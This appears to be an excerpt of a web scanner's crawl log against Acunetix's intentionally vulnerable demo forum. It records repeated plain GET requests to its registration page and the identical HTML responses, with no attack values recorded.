| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
